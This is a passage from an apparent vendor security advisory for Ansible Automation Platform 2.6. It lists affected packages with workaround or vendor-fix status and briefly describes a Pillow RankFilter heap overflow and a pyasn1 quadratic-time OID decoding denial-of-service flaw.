| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64 | — | ||
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch | — |
A flaw was found in pyasn1, a Python library for Abstract Syntax Notation One (ASN.1). The BER, CER, and DER decoders process OBJECT IDENTIFIER and RELATIVE-OID values in quadratic time relative to the number of arcs. A remote attacker could exploit this by providing a specially crafted payload containing an OID with many arcs, leading to excessive CPU consumption and a denial of service (DoS) in applications that decode untrusted ASN.1 data. The corresponding encoders also exhibit this quadratic behavior when re-encoding attacker-supplied values.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x | — |
Workaround
|
|
